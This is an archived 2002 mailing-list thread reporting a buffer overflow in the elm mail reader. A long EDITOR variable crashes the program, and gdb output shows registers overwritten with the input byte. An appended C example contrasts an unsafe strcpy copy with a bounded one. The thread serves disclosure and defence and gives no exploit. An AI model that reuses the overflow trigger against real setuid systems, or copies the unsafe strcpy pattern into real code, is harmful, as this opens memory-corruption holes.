Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)

From: Ehud Tenenbaum (analyzerat_private)
Date: Tue Feb 26 2002 - 00:43:04 PST


    Hey,
    
    Elm Version and Identification Information:
     
            Elm 2.5 PL3, of January 11, 2000
            (C) Copyright 1988-1999 USENET Community Trust
            Based on Elm 2.0, (C) Copyright 1986,1987 Dave Taylor      
    
    This is the one we made the tests on.
    
    Sincerely,
    2xs Security team.
    
    SecurITeam BugTraq Monitoring wrote:
    > 
    > Hi,
    > 
    > Elm 2.5 PL6, of August 7, 2001 isn't affected as you can see:
    > # export EDITOR=`perl -e 'print "A" x 2000;'`
    > 
    > # elm
    > 
    > Notice:  ELM requires an ".elm" subdirectory off your home directory
    > to hold information such as your configuration preferences (the
    > "elmrc" file) and aliases.
    > 
    > May I create this directory for you (yes/no/quit) ? [y] : n
    > Very well, but you may run into difficulties later.
    > 
    > Nothing happens
    > 
    > I don't think my version is old enough to manifest this vulnerability.
    > 
    > Thanks
    > Noam Rathaus
    > http://www.SecurITeam.com
    > http://www.BeyondSecurity.com
    > 
    > ----- Original Message -----
    > From: "Ehud Tenenbaum" <analyzerat_private>
    > To: <vuln-devat_private>
    > Sent: Sunday, February 24, 2002 08:45
    > Subject: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)
    > 
    > > Hey,
    > >
    > > 2xs Security team found a new bug in elm; although it's not suid
    > > on Linux systems (Red Hat 6.2, Mandrake 8.0, Slackware 7.1), we
    > > believe it's suid on other kinds of *nix OS such as HP-UX.
    > >
    > > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ id
    > > uid=100(w00p) gid=100(users) groups=100(users)
    > > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$
    > >
    > > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ export EDITOR=`perl -e 'print "A" x 2000;'`
    > > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ elm
    > >
    > > Notice:  ELM requires an ".elm" subdirectory off your home directory
    > > to hold information such as your configuration preferences (the
    > > "elmrc" file) and aliases.
    > >
    > > May I create this directory for you (yes/no/quit) ? [y] : n
    > > Segmentation fault
    > > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$
    > >
    > > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ gdb ./elm
    > > GNU gdb 5.0
    > > Copyright 2000 Free Software Foundation, Inc.
    > > GDB is free software, covered by the GNU General Public License, and you are
    > > welcome to change it and/or distribute copies of it under certain conditions.
    > > Type "show copying" to see the conditions.
    > > There is absolutely no warranty for GDB.  Type "show warranty" for details.
    > > This GDB was configured as "i386-slackware-linux"...
    > > (gdb) r
    > > Starting program: /tmp/w00p/elm2.5.3/bin/./elm
    > > warning: Unable to find dynamic linker breakpoint function.
    > > GDB will be unable to debug shared library initializers
    > > and track explicitly loaded dynamic code.
    > >
    > > Notice:  ELM requires an ".elm" subdirectory off your home directory
    > > to hold information such as your configuration preferences (the
    > > "elmrc" file) and aliases.
    > >
    > > May I create this directory for you (yes/no/quit) ? [y] : n
    > >
    > > Program received signal SIGSEGV, Segmentation fault.
    > > 0x40074486 in catgets () from /lib/libc.so.6
    > > (gdb) where
    > > #0  0x40074486 in catgets () from /lib/libc.so.6
    > > #1  0x805b6a6 in create_private_dir ()
    > > #2  0x805b3fc in initialize ()
    > > #3  0x80520bd in main ()
    > > #4  0x4006faa7 in __libc_start_main () from /lib/libc.so.6
    > > (gdb) info registers
    > > eax            0x41414141       1094795585
    > > ecx            0x40014000       1073823744
    > > edx            0x0      0
    > > ebx            0x4013bed4       1075035860
    > > esp            0xbfffeca0       0xbfffeca0
    > > ebp            0xbfffecb4       0xbfffecb4
    > > esi            0x41414141       1094795585
    > > edi            0xbffff264       -1073745308
    > > eip            0x40074486       0x40074486
    > > eflags         0x10202  66050
    > > cs             0x23     35
    > > ss             0x2b     43
    > > ds             0x2b     43
    > > es             0x2b     43
    > > fs             0x0      0
    > > gs             0x0      0
    > > fctrl          0x37f    895
    > > fstat          0x0      0
    > > ftag           0xffff   65535
    > > fiseg          0x0      0
    > > fioff          0x0      0
    > > foseg          0x0      0
    > > fooff          0xbffff8a4       -1073743708
    > > fop            0x0      0
    > > (gdb)
    > >
    > > Bug was found with BOS, Binary Overflow Scanner tool made
    > > by 2xs Security team.
    > >
    > > At this point we shall not release an exploit.
    > > For Questions or Comments:
    > >
    > > Ehud Tenenbaum <analyzerat_private> CTO & Project manager.
    > > Izik Kotler <izikat_private> Senior programmer.
    > > Mixter <mixterat_private> Senior programmer.
    > > acz <aczat_private> QA/Programmer.
    > >
    > > --
    > > ------------
    > > Ehud Tenenbaum
    > > C.T.O & Project Manager
    > > 2xs LTD.
    > > Tel: 972-9-9519980
    > > Fax: 972-9-9519982
    > > E-Mail: ehudat_private
    > > ------------
    > >                                  Have A Safe Day
    > >
    
    -- 
    ------------
    Ehud Tenenbaum
    C.T.O & Project Manager 
    2xs LTD. 
    Tel: 972-9-9519980
    Fax: 972-9-9519982
    E-Mail: ehudat_private
    ------------ 
                                     Have A Safe Day
    
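The trace in the quoted report shows the classic signature of an unchecked copy of an environment variable: a 2000-byte EDITOR value, a crash in a libc call reached from create_private_dir(), and eax/esi holding 0x41414141, the fill byte of the input. The following C program is an added example written for this archive, not code from elm or from the 2xs report, and the buffer size (256), function names and inputs in it are assumptions. It places the unsafe copy pattern beside a bounded version that rejects over-long values, adds the pre-check a length-ramping scanner like the one described would apply, and includes the crash-triage test that flags a register filled entirely with the input byte.

```c
/* Added example, not code from elm or from the 2xs report. It models the
 * defect class the trace above points at: an environment variable (EDITOR)
 * copied into a fixed-size buffer without a length check, so a long value
 * overwrites adjacent memory and the fill byte 0x41 ('A') later shows up in
 * registers when the clobbered data is used.
 * The buffer size, function names and inputs below are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EDITOR_BUF 256   /* assumed size; elm's real buffer size is not on the page */

/* The unsafe pattern, shown only for contrast: strcpy() copies until the
 * NUL byte no matter how large dst is. Not called below. */
void unsafe_copy_editor(const char *value, char *dst)
{
    strcpy(dst, value);
}

/* Hardened form: refuse values that do not fit, including the terminator.
 * Returns 0 on success, -1 when the value is missing or too long. Rejecting
 * is preferable to silent truncation, which can hide the problem. */
int copy_editor_setting(const char *value, char *dst, size_t dstsz)
{
    if (value == NULL || dst == NULL || dstsz == 0)
        return -1;
    size_t n = strlen(value);
    if (n >= dstsz)
        return -1;
    memcpy(dst, value, n + 1);
    return 0;
}

/* Pre-check a scanner like the one described (growing runs of 'A' fed
 * through an environment variable) would use: 1 if the value would overrun
 * a buffer of bufsz bytes, 0 otherwise. */
int env_value_overflows(const char *value, size_t bufsz)
{
    return value != NULL && strlen(value) >= bufsz;
}

/* Crash triage helper: 1 if every byte of a 32-bit register equals the fill
 * byte, as with eax/esi = 0x41414141 in the gdb output above, meaning input
 * bytes reached that register. */
int is_fill_pattern(uint32_t reg, unsigned char fill)
{
    uint32_t pat = 0x01010101u * fill;
    return reg == pat;
}

/* Constructed input: a run of len 'A' bytes, like perl -e 'print "A" x 2000'.
 * Caller frees. */
char *make_run_of_a(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

int main(void)
{
    char editor[EDITOR_BUF];
    char *big = make_run_of_a(2000);
    if (big == NULL)
        return 1;

    printf("2000-byte value overflows a %d-byte buffer: %s\n", EDITOR_BUF,
           env_value_overflows(big, EDITOR_BUF) ? "yes" : "no");
    printf("bounded copy of it: %s\n",
           copy_editor_setting(big, editor, sizeof editor) == 0 ? "accepted" : "rejected");
    printf("bounded copy of \"vi\": %s (editor=%s)\n",
           copy_editor_setting("vi", editor, sizeof editor) == 0 ? "accepted" : "rejected",
           editor);
    printf("eax=0x41414141 is the fill pattern: %s\n",
           is_fill_pattern(0x41414141u, 'A') ? "yes" : "no");
    free(big);
    return 0;
}
```

The same reject-on-overlength check applies to any other environment-derived setting a mail reader copies into fixed storage; when triaging a scanner crash, a register equal to the fill pattern is the quickest confirmation that the input, rather than an unrelated fault, caused the SIGSEGV.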



    This archive was generated by hypermail 2b30 : Tue Feb 26 2002 - 02:22:27 PST